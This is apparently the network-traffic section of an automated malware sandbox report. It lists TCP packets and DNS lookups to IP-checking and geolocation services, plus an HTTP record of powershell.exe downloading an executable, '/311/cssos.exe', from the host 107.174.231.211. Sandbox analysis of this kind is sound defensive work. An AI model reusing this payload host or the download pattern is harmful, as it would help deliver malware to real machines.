                                                                                          Mar 13, 2025 01:19:00.647936106 CET8049683107.174.231.211192.168.2.9
                                                                                          Mar 13, 2025 01:19:00.647948027 CET8049683107.174.231.211192.168.2.9
                                                                                          Mar 13, 2025 01:19:00.647960901 CET8049683107.174.231.211192.168.2.9
                                                                                          Mar 13, 2025 01:19:00.647973061 CET8049683107.174.231.211192.168.2.9
                                                                                          Mar 13, 2025 01:19:00.647984982 CET8049683107.174.231.211192.168.2.9
                                                                                          Mar 13, 2025 01:19:00.647998095 CET4968380192.168.2.9107.174.231.211
                                                                                          Mar 13, 2025 01:19:00.647998095 CET4968380192.168.2.9107.174.231.211
                                                                                          Mar 13, 2025 01:19:00.647998095 CET4968380192.168.2.9107.174.231.211
                                                                                          Mar 13, 2025 01:19:00.648061991 CET4968380192.168.2.9107.174.231.211
                                                                                          Mar 13, 2025 01:19:00.648061991 CET4968380192.168.2.9107.174.231.211
                                                                                          Mar 13, 2025 01:19:00.648662090 CET8049683107.174.231.211192.168.2.9
                                                                                          Mar 13, 2025 01:19:00.648674011 CET8049683107.174.231.211192.168.2.9
                                                                                          Mar 13, 2025 01:19:00.648685932 CET8049683107.174.231.211192.168.2.9
                                                                                          Mar 13, 2025 01:19:00.648699045 CET8049683107.174.231.211192.168.2.9
                                                                                          Mar 13, 2025 01:19:00.648710966 CET8049683107.174.231.211192.168.2.9
                                                                                          Mar 13, 2025 01:19:00.648724079 CET8049683107.174.231.211192.168.2.9
                                                                                          Mar 13, 2025 01:19:00.648736000 CET8049683107.174.231.211192.168.2.9
                                                                                          Mar 13, 2025 01:19:00.648747921 CET4968380192.168.2.9107.174.231.211
                                                                                          Mar 13, 2025 01:19:00.648747921 CET4968380192.168.2.9107.174.231.211
                                                                                          Mar 13, 2025 01:19:00.648751020 CET8049683107.174.231.211192.168.2.9
                                                                                          Mar 13, 2025 01:19:00.648763895 CET8049683107.174.231.211192.168.2.9
                                                                                          Mar 13, 2025 01:19:00.648776054 CET8049683107.174.231.211192.168.2.9
                                                                                          Mar 13, 2025 01:19:00.648781061 CET4968380192.168.2.9107.174.231.211
                                                                                          Mar 13, 2025 01:19:00.648787975 CET8049683107.174.231.211192.168.2.9
                                                                                          Mar 13, 2025 01:19:00.648792982 CET4968380192.168.2.9107.174.231.211
                                                                                          Mar 13, 2025 01:19:00.648802996 CET8049683107.174.231.211192.168.2.9
                                                                                          Mar 13, 2025 01:19:00.648816109 CET8049683107.174.231.211192.168.2.9
                                                                                          Mar 13, 2025 01:19:00.648821115 CET4968380192.168.2.9107.174.231.211
                                                                                          Mar 13, 2025 01:19:00.648821115 CET4968380192.168.2.9107.174.231.211
                                                                                          Mar 13, 2025 01:19:00.648859978 CET4968380192.168.2.9107.174.231.211
                                                                                          Mar 13, 2025 01:19:00.649373055 CET8049683107.174.231.211192.168.2.9
                                                                                          Mar 13, 2025 01:19:00.649385929 CET8049683107.174.231.211192.168.2.9
                                                                                          Mar 13, 2025 01:19:00.649393082 CET8049683107.174.231.211192.168.2.9
                                                                                          Mar 13, 2025 01:19:00.649405003 CET8049683107.174.231.211192.168.2.9
                                                                                          Mar 13, 2025 01:19:00.649420023 CET8049683107.174.231.211192.168.2.9
                                                                                          Mar 13, 2025 01:19:00.649430990 CET8049683107.174.231.211192.168.2.9
                                                                                          Mar 13, 2025 01:19:00.649442911 CET8049683107.174.231.211192.168.2.9
                                                                                          Mar 13, 2025 01:19:00.649455070 CET8049683107.174.231.211192.168.2.9
                                                                                          Mar 13, 2025 01:19:00.649466991 CET8049683107.174.231.211192.168.2.9
                                                                                          Mar 13, 2025 01:19:00.649466991 CET4968380192.168.2.9107.174.231.211
                                                                                          Mar 13, 2025 01:19:00.649466991 CET4968380192.168.2.9107.174.231.211
                                                                                          Mar 13, 2025 01:19:00.649480104 CET8049683107.174.231.211192.168.2.9
                                                                                          Mar 13, 2025 01:19:00.649494886 CET8049683107.174.231.211192.168.2.9
                                                                                          Mar 13, 2025 01:19:00.649506092 CET8049683107.174.231.211192.168.2.9
                                                                                          Mar 13, 2025 01:19:00.649516106 CET4968380192.168.2.9107.174.231.211
                                                                                          Mar 13, 2025 01:19:00.649516106 CET4968380192.168.2.9107.174.231.211
                                                                                          Mar 13, 2025 01:19:00.649519920 CET8049683107.174.231.211192.168.2.9
                                                                                          Mar 13, 2025 01:19:00.649533033 CET8049683107.174.231.211192.168.2.9
                                                                                          Mar 13, 2025 01:19:00.649545908 CET8049683107.174.231.211192.168.2.9
                                                                                          Mar 13, 2025 01:19:00.649554968 CET4968380192.168.2.9107.174.231.211
                                                                                          Mar 13, 2025 01:19:00.649555922 CET8049683107.174.231.211192.168.2.9
                                                                                          Mar 13, 2025 01:19:00.649554968 CET4968380192.168.2.9107.174.231.211
                                                                                          Mar 13, 2025 01:19:00.649570942 CET8049683107.174.231.211192.168.2.9
                                                                                          Mar 13, 2025 01:19:00.649584055 CET8049683107.174.231.211192.168.2.9
                                                                                          Mar 13, 2025 01:19:00.649708986 CET4968380192.168.2.9107.174.231.211
                                                                                          Mar 13, 2025 01:19:00.649708986 CET4968380192.168.2.9107.174.231.211
                                                                                          Mar 13, 2025 01:19:00.650331020 CET8049683107.174.231.211192.168.2.9
                                                                                          Mar 13, 2025 01:19:00.650346041 CET8049683107.174.231.211192.168.2.9
                                                                                          Mar 13, 2025 01:19:00.650357962 CET8049683107.174.231.211192.168.2.9
                                                                                          Mar 13, 2025 01:19:00.650369883 CET8049683107.174.231.211192.168.2.9
                                                                                          Mar 13, 2025 01:19:00.650382996 CET8049683107.174.231.211192.168.2.9
                                                                                          Mar 13, 2025 01:19:00.650397062 CET8049683107.174.231.211192.168.2.9
                                                                                          Mar 13, 2025 01:19:00.650408983 CET8049683107.174.231.211192.168.2.9
                                                                                          Mar 13, 2025 01:19:00.650415897 CET4968380192.168.2.9107.174.231.211
                                                                                          Mar 13, 2025 01:19:00.650415897 CET4968380192.168.2.9107.174.231.211
                                                                                          Mar 13, 2025 01:19:00.650422096 CET8049683107.174.231.211192.168.2.9
                                                                                          Mar 13, 2025 01:19:00.650434971 CET8049683107.174.231.211192.168.2.9
                                                                                          Mar 13, 2025 01:19:00.650446892 CET8049683107.174.231.211192.168.2.9
                                                                                          Mar 13, 2025 01:19:00.650458097 CET8049683107.174.231.211192.168.2.9
                                                                                          Mar 13, 2025 01:19:00.650469065 CET8049683107.174.231.211192.168.2.9
                                                                                          Mar 13, 2025 01:19:00.650475979 CET4968380192.168.2.9107.174.231.211
                                                                                          Mar 13, 2025 01:19:00.650475979 CET4968380192.168.2.9107.174.231.211
                                                                                          Mar 13, 2025 01:19:00.650475979 CET4968380192.168.2.9107.174.231.211
                                                                                          Mar 13, 2025 01:19:00.650482893 CET8049683107.174.231.211192.168.2.9
                                                                                          Mar 13, 2025 01:19:00.650496960 CET8049683107.174.231.211192.168.2.9
                                                                                          Mar 13, 2025 01:19:00.650507927 CET8049683107.174.231.211192.168.2.9
                                                                                          Mar 13, 2025 01:19:00.650520086 CET8049683107.174.231.211192.168.2.9
                                                                                          Mar 13, 2025 01:19:00.650532007 CET8049683107.174.231.211192.168.2.9
                                                                                          Mar 13, 2025 01:19:00.650544882 CET8049683107.174.231.211192.168.2.9
                                                                                          Mar 13, 2025 01:19:00.650557995 CET8049683107.174.231.211192.168.2.9
                                                                                          Mar 13, 2025 01:19:00.650561094 CET4968380192.168.2.9107.174.231.211
                                                                                          Mar 13, 2025 01:19:00.650561094 CET4968380192.168.2.9107.174.231.211
                                                                                          Mar 13, 2025 01:19:00.650561094 CET4968380192.168.2.9107.174.231.211
                                                                                          Mar 13, 2025 01:19:00.650644064 CET4968380192.168.2.9107.174.231.211
                                                                                          Mar 13, 2025 01:19:00.650644064 CET4968380192.168.2.9107.174.231.211
                                                                                          Mar 13, 2025 01:19:00.734132051 CET8049683107.174.231.211192.168.2.9
                                                                                          Mar 13, 2025 01:19:00.734297991 CET4968380192.168.2.9107.174.231.211
                                                                                          Mar 13, 2025 01:19:00.734345913 CET8049683107.174.231.211192.168.2.9
                                                                                          Mar 13, 2025 01:19:00.734360933 CET8049683107.174.231.211192.168.2.9
                                                                                          Mar 13, 2025 01:19:00.734452009 CET4968380192.168.2.9107.174.231.211
                                                                                          Mar 13, 2025 01:19:00.734498024 CET8049683107.174.231.211192.168.2.9
                                                                                          Mar 13, 2025 01:19:00.734513998 CET8049683107.174.231.211192.168.2.9
                                                                                          Mar 13, 2025 01:19:00.734528065 CET8049683107.174.231.211192.168.2.9
                                                                                          Mar 13, 2025 01:19:00.734546900 CET8049683107.174.231.211192.168.2.9
                                                                                          Mar 13, 2025 01:19:00.734561920 CET8049683107.174.231.211192.168.2.9
                                                                                          Mar 13, 2025 01:19:00.734569073 CET4968380192.168.2.9107.174.231.211
                                                                                          Mar 13, 2025 01:19:00.734574080 CET8049683107.174.231.211192.168.2.9
                                                                                          Mar 13, 2025 01:19:00.734592915 CET8049683107.174.231.211192.168.2.9
                                                                                          Mar 13, 2025 01:19:00.734594107 CET4968380192.168.2.9107.174.231.211
                                                                                          Mar 13, 2025 01:19:00.734616041 CET4968380192.168.2.9107.174.231.211
                                                                                          Mar 13, 2025 01:19:00.734646082 CET4968380192.168.2.9107.174.231.211
                                                                                          Mar 13, 2025 01:19:00.734647036 CET8049683107.174.231.211192.168.2.9
                                                                                          Mar 13, 2025 01:19:00.734663010 CET8049683107.174.231.211192.168.2.9
                                                                                          Mar 13, 2025 01:19:00.734680891 CET8049683107.174.231.211192.168.2.9
                                                                                          Mar 13, 2025 01:19:00.734726906 CET4968380192.168.2.9107.174.231.211
                                                                                          Mar 13, 2025 01:19:00.734726906 CET4968380192.168.2.9107.174.231.211
                                                                                          Mar 13, 2025 01:19:00.735146999 CET8049683107.174.231.211192.168.2.9
                                                                                          Mar 13, 2025 01:19:00.735163927 CET8049683107.174.231.211192.168.2.9
                                                                                          Mar 13, 2025 01:19:00.735177040 CET8049683107.174.231.211192.168.2.9
                                                                                          Mar 13, 2025 01:19:00.735200882 CET8049683107.174.231.211192.168.2.9
                                                                                          Mar 13, 2025 01:19:00.735213995 CET4968380192.168.2.9107.174.231.211
                                                                                          Mar 13, 2025 01:19:00.735219002 CET8049683107.174.231.211192.168.2.9
                                                                                          Mar 13, 2025 01:19:00.735238075 CET8049683107.174.231.211192.168.2.9
                                                                                          Mar 13, 2025 01:19:00.735251904 CET8049683107.174.231.211192.168.2.9
                                                                                          Mar 13, 2025 01:19:00.735255957 CET4968380192.168.2.9107.174.231.211
                                                                                          Mar 13, 2025 01:19:00.735305071 CET4968380192.168.2.9107.174.231.211
                                                                                          Mar 13, 2025 01:19:00.735305071 CET4968380192.168.2.9107.174.231.211
                                                                                          Mar 13, 2025 01:19:00.735311985 CET8049683107.174.231.211192.168.2.9
                                                                                          Mar 13, 2025 01:19:00.735327005 CET8049683107.174.231.211192.168.2.9
                                                                                          Mar 13, 2025 01:19:00.735342979 CET8049683107.174.231.211192.168.2.9
                                                                                          Mar 13, 2025 01:19:00.735354900 CET8049683107.174.231.211192.168.2.9
                                                                                          Mar 13, 2025 01:19:00.735368013 CET8049683107.174.231.211192.168.2.9
                                                                                          Mar 13, 2025 01:19:00.735382080 CET8049683107.174.231.211192.168.2.9
                                                                                          Mar 13, 2025 01:19:00.735398054 CET8049683107.174.231.211192.168.2.9
                                                                                          Mar 13, 2025 01:19:00.735424995 CET4968380192.168.2.9107.174.231.211
                                                                                          Mar 13, 2025 01:19:00.735424995 CET4968380192.168.2.9107.174.231.211
                                                                                          Mar 13, 2025 01:19:00.735424995 CET4968380192.168.2.9107.174.231.211
                                                                                          Mar 13, 2025 01:19:00.735466003 CET4968380192.168.2.9107.174.231.211
                                                                                          Mar 13, 2025 01:19:00.735845089 CET8049683107.174.231.211192.168.2.9
                                                                                          Mar 13, 2025 01:19:00.735866070 CET8049683107.174.231.211192.168.2.9
                                                                                          Mar 13, 2025 01:19:00.735868931 CET8049683107.174.231.211192.168.2.9
                                                                                          Mar 13, 2025 01:19:00.735872030 CET8049683107.174.231.211192.168.2.9
                                                                                          Mar 13, 2025 01:19:00.735937119 CET4968380192.168.2.9107.174.231.211
                                                                                          Mar 13, 2025 01:19:00.735937119 CET4968380192.168.2.9107.174.231.211
                                                                                          Mar 13, 2025 01:19:00.736022949 CET8049683107.174.231.211192.168.2.9
                                                                                          Mar 13, 2025 01:19:00.736040115 CET8049683107.174.231.211192.168.2.9
                                                                                          Mar 13, 2025 01:19:00.736052990 CET8049683107.174.231.211192.168.2.9
                                                                                          Mar 13, 2025 01:19:00.736066103 CET8049683107.174.231.211192.168.2.9
                                                                                          Mar 13, 2025 01:19:00.736078978 CET8049683107.174.231.211192.168.2.9
                                                                                          Mar 13, 2025 01:19:00.736092091 CET8049683107.174.231.211192.168.2.9
                                                                                          Mar 13, 2025 01:19:00.736104965 CET8049683107.174.231.211192.168.2.9
                                                                                          Mar 13, 2025 01:19:00.736118078 CET8049683107.174.231.211192.168.2.9
                                                                                          Mar 13, 2025 01:19:00.736121893 CET4968380192.168.2.9107.174.231.211
                                                                                          Mar 13, 2025 01:19:00.736121893 CET4968380192.168.2.9107.174.231.211
                                                                                          Mar 13, 2025 01:19:00.736135960 CET8049683107.174.231.211192.168.2.9
                                                                                          Mar 13, 2025 01:19:00.736151934 CET8049683107.174.231.211192.168.2.9
                                                                                          Mar 13, 2025 01:19:00.736169100 CET4968380192.168.2.9107.174.231.211
                                                                                          Mar 13, 2025 01:19:00.736169100 CET4968380192.168.2.9107.174.231.211
                                                                                          Mar 13, 2025 01:19:00.736186981 CET4968380192.168.2.9107.174.231.211
                                                                                          Mar 13, 2025 01:19:00.736982107 CET8049683107.174.231.211192.168.2.9
                                                                                          Mar 13, 2025 01:19:00.737128019 CET8049683107.174.231.211192.168.2.9
                                                                                          Mar 13, 2025 01:19:00.737128973 CET4968380192.168.2.9107.174.231.211
                                                                                          Mar 13, 2025 01:19:00.737142086 CET8049683107.174.231.211192.168.2.9
                                                                                          Mar 13, 2025 01:19:00.737159967 CET8049683107.174.231.211192.168.2.9
                                                                                          Mar 13, 2025 01:19:00.737179995 CET8049683107.174.231.211192.168.2.9
                                                                                          Mar 13, 2025 01:19:00.737179995 CET4968380192.168.2.9107.174.231.211
                                                                                          Mar 13, 2025 01:19:00.737195969 CET8049683107.174.231.211192.168.2.9
                                                                                          Mar 13, 2025 01:19:00.737207890 CET4968380192.168.2.9107.174.231.211
                                                                                          Mar 13, 2025 01:19:00.737209082 CET8049683107.174.231.211192.168.2.9
                                                                                          Mar 13, 2025 01:19:00.737226963 CET8049683107.174.231.211192.168.2.9
                                                                                          Mar 13, 2025 01:19:00.737253904 CET4968380192.168.2.9107.174.231.211
                                                                                          Mar 13, 2025 01:19:00.737253904 CET4968380192.168.2.9107.174.231.211
                                                                                          Mar 13, 2025 01:19:00.737276077 CET4968380192.168.2.9107.174.231.211
                                                                                          Mar 13, 2025 01:19:00.737282038 CET8049683107.174.231.211192.168.2.9
                                                                                          Mar 13, 2025 01:19:00.737298012 CET8049683107.174.231.211192.168.2.9
                                                                                          Mar 13, 2025 01:19:00.737310886 CET8049683107.174.231.211192.168.2.9
                                                                                          Mar 13, 2025 01:19:00.737324953 CET8049683107.174.231.211192.168.2.9
                                                                                          Mar 13, 2025 01:19:00.737411976 CET4968380192.168.2.9107.174.231.211
                                                                                          Mar 13, 2025 01:19:00.737411976 CET4968380192.168.2.9107.174.231.211
                                                                                          Mar 13, 2025 01:19:00.737755060 CET8049683107.174.231.211192.168.2.9
                                                                                          Mar 13, 2025 01:19:00.737771988 CET8049683107.174.231.211192.168.2.9
                                                                                          Mar 13, 2025 01:19:00.737788916 CET8049683107.174.231.211192.168.2.9
                                                                                          Mar 13, 2025 01:19:00.737812996 CET4968380192.168.2.9107.174.231.211
                                                                                          Mar 13, 2025 01:19:00.737831116 CET4968380192.168.2.9107.174.231.211
                                                                                          Mar 13, 2025 01:19:00.737921953 CET8049683107.174.231.211192.168.2.9
                                                                                          Mar 13, 2025 01:19:00.737936020 CET8049683107.174.231.211192.168.2.9
                                                                                          Mar 13, 2025 01:19:00.737952948 CET8049683107.174.231.211192.168.2.9
                                                                                          Mar 13, 2025 01:19:00.737966061 CET8049683107.174.231.211192.168.2.9
                                                                                          Mar 13, 2025 01:19:00.737978935 CET8049683107.174.231.211192.168.2.9
                                                                                          Mar 13, 2025 01:19:00.737994909 CET4968380192.168.2.9107.174.231.211
                                                                                          Mar 13, 2025 01:19:00.738024950 CET4968380192.168.2.9107.174.231.211
                                                                                          Mar 13, 2025 01:19:00.738024950 CET4968380192.168.2.9107.174.231.211
                                                                                          Mar 13, 2025 01:19:00.738082886 CET8049683107.174.231.211192.168.2.9
                                                                                          Mar 13, 2025 01:19:00.738095999 CET8049683107.174.231.211192.168.2.9
                                                                                          Mar 13, 2025 01:19:00.738109112 CET8049683107.174.231.211192.168.2.9
                                                                                          Mar 13, 2025 01:19:00.738128901 CET8049683107.174.231.211192.168.2.9
                                                                                          Mar 13, 2025 01:19:00.738135099 CET8049683107.174.231.211192.168.2.9
                                                                                          Mar 13, 2025 01:19:00.738137960 CET8049683107.174.231.211192.168.2.9
                                                                                          Mar 13, 2025 01:19:00.738145113 CET8049683107.174.231.211192.168.2.9
                                                                                          Mar 13, 2025 01:19:00.738152981 CET8049683107.174.231.211192.168.2.9
                                                                                          Mar 13, 2025 01:19:00.738195896 CET4968380192.168.2.9107.174.231.211
                                                                                          Mar 13, 2025 01:19:00.738195896 CET4968380192.168.2.9107.174.231.211
                                                                                          Mar 13, 2025 01:19:00.738195896 CET4968380192.168.2.9107.174.231.211
                                                                                          Mar 13, 2025 01:19:00.738243103 CET4968380192.168.2.9107.174.231.211
                                                                                          Mar 13, 2025 01:19:00.738245010 CET8049683107.174.231.211192.168.2.9
                                                                                          Mar 13, 2025 01:19:00.738260984 CET8049683107.174.231.211192.168.2.9
                                                                                          Mar 13, 2025 01:19:00.738272905 CET8049683107.174.231.211192.168.2.9
                                                                                          Mar 13, 2025 01:19:00.738286018 CET8049683107.174.231.211192.168.2.9
                                                                                          Mar 13, 2025 01:19:00.738298893 CET8049683107.174.231.211192.168.2.9
                                                                                          Mar 13, 2025 01:19:00.738308907 CET4968380192.168.2.9107.174.231.211
                                                                                          Mar 13, 2025 01:19:00.738308907 CET4968380192.168.2.9107.174.231.211
                                                                                          Mar 13, 2025 01:19:00.738313913 CET8049683107.174.231.211192.168.2.9
                                                                                          Mar 13, 2025 01:19:00.738328934 CET8049683107.174.231.211192.168.2.9
                                                                                          Mar 13, 2025 01:19:00.738347054 CET4968380192.168.2.9107.174.231.211
                                                                                          Mar 13, 2025 01:19:00.738347054 CET8049683107.174.231.211192.168.2.9
                                                                                          Mar 13, 2025 01:19:00.738375902 CET8049683107.174.231.211192.168.2.9
                                                                                          Mar 13, 2025 01:19:00.738414049 CET4968380192.168.2.9107.174.231.211
                                                                                          Mar 13, 2025 01:19:00.738414049 CET4968380192.168.2.9107.174.231.211
                                                                                          Mar 13, 2025 01:19:00.738414049 CET4968380192.168.2.9107.174.231.211
                                                                                          Mar 13, 2025 01:19:00.739151955 CET8049683107.174.231.211192.168.2.9
                                                                                          Mar 13, 2025 01:19:00.739166021 CET8049683107.174.231.211192.168.2.9
                                                                                          Mar 13, 2025 01:19:00.739176989 CET8049683107.174.231.211192.168.2.9
                                                                                          Mar 13, 2025 01:19:00.739193916 CET8049683107.174.231.211192.168.2.9
                                                                                          Mar 13, 2025 01:19:00.739207029 CET8049683107.174.231.211192.168.2.9
                                                                                          Mar 13, 2025 01:19:00.739219904 CET8049683107.174.231.211192.168.2.9
                                                                                          Mar 13, 2025 01:19:00.739228964 CET4968380192.168.2.9107.174.231.211
                                                                                          Mar 13, 2025 01:19:00.739243984 CET8049683107.174.231.211192.168.2.9
                                                                                          Mar 13, 2025 01:19:00.739258051 CET8049683107.174.231.211192.168.2.9
                                                                                          Mar 13, 2025 01:19:00.739270926 CET8049683107.174.231.211192.168.2.9
                                                                                          Mar 13, 2025 01:19:00.739284039 CET8049683107.174.231.211192.168.2.9
                                                                                          Mar 13, 2025 01:19:00.739295006 CET4968380192.168.2.9107.174.231.211
                                                                                          Mar 13, 2025 01:19:00.739295006 CET4968380192.168.2.9107.174.231.211
                                                                                          Mar 13, 2025 01:19:00.739295006 CET4968380192.168.2.9107.174.231.211
                                                                                          Mar 13, 2025 01:19:00.739296913 CET8049683107.174.231.211192.168.2.9
                                                                                          Mar 13, 2025 01:19:00.739310980 CET8049683107.174.231.211192.168.2.9
                                                                                          Mar 13, 2025 01:19:00.739324093 CET8049683107.174.231.211192.168.2.9
                                                                                          Mar 13, 2025 01:19:00.739337921 CET8049683107.174.231.211192.168.2.9
                                                                                          Mar 13, 2025 01:19:00.739339113 CET4968380192.168.2.9107.174.231.211
                                                                                          Mar 13, 2025 01:19:00.739339113 CET4968380192.168.2.9107.174.231.211
                                                                                          Mar 13, 2025 01:19:00.739352942 CET8049683107.174.231.211192.168.2.9
                                                                                          Mar 13, 2025 01:19:00.739392042 CET4968380192.168.2.9107.174.231.211
                                                                                          Mar 13, 2025 01:19:00.739392042 CET4968380192.168.2.9107.174.231.211
                                                                                          Mar 13, 2025 01:19:04.937853098 CET8049683107.174.231.211192.168.2.9
                                                                                          Mar 13, 2025 01:19:04.937998056 CET4968380192.168.2.9107.174.231.211
                                                                                          Mar 13, 2025 01:19:06.206231117 CET4968480192.168.2.9132.226.247.73
                                                                                          Mar 13, 2025 01:19:06.212286949 CET8049684132.226.247.73192.168.2.9
                                                                                          Mar 13, 2025 01:19:06.212359905 CET4968480192.168.2.9132.226.247.73
                                                                                          Mar 13, 2025 01:19:06.212821007 CET4968480192.168.2.9132.226.247.73
                                                                                          Mar 13, 2025 01:19:06.218569040 CET8049684132.226.247.73192.168.2.9
                                                                                          Mar 13, 2025 01:19:07.070332050 CET8049684132.226.247.73192.168.2.9
                                                                                          Mar 13, 2025 01:19:07.105840921 CET8049684132.226.247.73192.168.2.9
                                                                                          Mar 13, 2025 01:19:07.109981060 CET4968480192.168.2.9132.226.247.73
                                                                                          Mar 13, 2025 01:19:07.323632002 CET4968480192.168.2.9132.226.247.73
                                                                                          Mar 13, 2025 01:19:07.328378916 CET8049684132.226.247.73192.168.2.9
                                                                                          Mar 13, 2025 01:19:07.532721043 CET8049684132.226.247.73192.168.2.9
                                                                                          Mar 13, 2025 01:19:07.549351931 CET49685443192.168.2.9104.21.64.1
                                                                                          Mar 13, 2025 01:19:07.549397945 CET44349685104.21.64.1192.168.2.9
                                                                                          Mar 13, 2025 01:19:07.549494982 CET49685443192.168.2.9104.21.64.1
                                                                                          Mar 13, 2025 01:19:07.559151888 CET49685443192.168.2.9104.21.64.1
                                                                                          Mar 13, 2025 01:19:07.559194088 CET44349685104.21.64.1192.168.2.9
                                                                                          Mar 13, 2025 01:19:07.582870960 CET4968480192.168.2.9132.226.247.73
                                                                                          Mar 13, 2025 01:19:07.998168945 CET4968380192.168.2.9107.174.231.211
                                                                                          Mar 13, 2025 01:19:09.477550030 CET44349685104.21.64.1192.168.2.9
                                                                                          Mar 13, 2025 01:19:09.477802992 CET49685443192.168.2.9104.21.64.1
                                                                                          Mar 13, 2025 01:19:09.483911037 CET49685443192.168.2.9104.21.64.1
                                                                                          Mar 13, 2025 01:19:09.483928919 CET44349685104.21.64.1192.168.2.9
                                                                                          Mar 13, 2025 01:19:09.484293938 CET44349685104.21.64.1192.168.2.9
                                                                                          Mar 13, 2025 01:19:09.536020041 CET49685443192.168.2.9104.21.64.1
                                                                                          Mar 13, 2025 01:19:09.543234110 CET49685443192.168.2.9104.21.64.1
                                                                                          Mar 13, 2025 01:19:09.588330030 CET44349685104.21.64.1192.168.2.9
                                                                                          Mar 13, 2025 01:19:09.929371119 CET44349685104.21.64.1192.168.2.9
                                                                                          Mar 13, 2025 01:19:09.929435968 CET44349685104.21.64.1192.168.2.9
                                                                                          Mar 13, 2025 01:19:09.929480076 CET49685443192.168.2.9104.21.64.1
                                                                                          Mar 13, 2025 01:19:09.937571049 CET49685443192.168.2.9104.21.64.1
                                                                                          Mar 13, 2025 01:20:12.533021927 CET8049684132.226.247.73192.168.2.9
                                                                                          Mar 13, 2025 01:20:12.533113003 CET4968480192.168.2.9132.226.247.73
                                                                                          Mar 13, 2025 01:20:47.537209988 CET4968480192.168.2.9132.226.247.73
                                                                                          Mar 13, 2025 01:20:47.542733908 CET8049684132.226.247.73192.168.2.9

                                                                                          UDP Packets

                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                          Mar 13, 2025 01:19:06.188671112 CET5726153192.168.2.91.1.1.1
                                                                                          Mar 13, 2025 01:19:06.199187040 CET53572611.1.1.1192.168.2.9
                                                                                          Mar 13, 2025 01:19:07.535959005 CET6055453192.168.2.91.1.1.1
                                                                                          Mar 13, 2025 01:19:07.545905113 CET53605541.1.1.1192.168.2.9

                                                                                          DNS Queries

                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                          Mar 13, 2025 01:19:06.188671112 CET192.168.2.91.1.1.10x72d4Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                          Mar 13, 2025 01:19:07.535959005 CET192.168.2.91.1.1.10x2315Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false

                                                                                          DNS Answers

                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                          Mar 13, 2025 01:19:06.199187040 CET1.1.1.1192.168.2.90x72d4No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                          Mar 13, 2025 01:19:06.199187040 CET1.1.1.1192.168.2.90x72d4No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                          Mar 13, 2025 01:19:06.199187040 CET1.1.1.1192.168.2.90x72d4No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                          Mar 13, 2025 01:19:06.199187040 CET1.1.1.1192.168.2.90x72d4No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                          Mar 13, 2025 01:19:06.199187040 CET1.1.1.1192.168.2.90x72d4No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                          Mar 13, 2025 01:19:06.199187040 CET1.1.1.1192.168.2.90x72d4No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                          Mar 13, 2025 01:19:07.545905113 CET1.1.1.1192.168.2.90x2315No error (0)reallyfreegeoip.org104.21.64.1A (IP address)IN (0x0001)false
                                                                                          Mar 13, 2025 01:19:07.545905113 CET1.1.1.1192.168.2.90x2315No error (0)reallyfreegeoip.org104.21.112.1A (IP address)IN (0x0001)false
                                                                                          Mar 13, 2025 01:19:07.545905113 CET1.1.1.1192.168.2.90x2315No error (0)reallyfreegeoip.org104.21.80.1A (IP address)IN (0x0001)false
                                                                                          Mar 13, 2025 01:19:07.545905113 CET1.1.1.1192.168.2.90x2315No error (0)reallyfreegeoip.org104.21.96.1A (IP address)IN (0x0001)false
                                                                                          Mar 13, 2025 01:19:07.545905113 CET1.1.1.1192.168.2.90x2315No error (0)reallyfreegeoip.org104.21.32.1A (IP address)IN (0x0001)false
                                                                                          Mar 13, 2025 01:19:07.545905113 CET1.1.1.1192.168.2.90x2315No error (0)reallyfreegeoip.org104.21.48.1A (IP address)IN (0x0001)false
                                                                                          Mar 13, 2025 01:19:07.545905113 CET1.1.1.1192.168.2.90x2315No error (0)reallyfreegeoip.org104.21.16.1A (IP address)IN (0x0001)false

                                                                                          HTTP Request Dependency Graph

                                                                                          • reallyfreegeoip.org
                                                                                          • 107.174.231.211
                                                                                          • checkip.dyndns.org

                                                                                          HTTP Packets

                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          0192.168.2.949683107.174.231.211805004C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Mar 13, 2025 01:18:59.400007963 CET288OUTGET /311/cssos.exe HTTP/1.1
                                                                                          Accept: */*
                                                                                          Accept-Encoding: gzip, deflate
                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                          Host: 107.174.231.211
                                                                                          Connection: Keep-Alive
                                                                                          Mar 13, 2025 01:18:59.937964916 CET1236INHTTP/1.1 200 OK
                                                                                          Date: Thu, 13 Mar 2025 00:18:59 GMT
                                                                                          Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                                                          Last-Modified: Wed, 12 Mar 2025 12:46:06 GMT
                                                                                          ETag: "ec400-6302496c05d92"
                                                                                          Accept-Ranges: bytes
                                                                                          Content-Length: 967680
                                                                                          Keep-Alive: timeout=5, max=100
                                                                                          Connection: Keep-Alive
                                                                                          Content-Type: application/x-msdownload
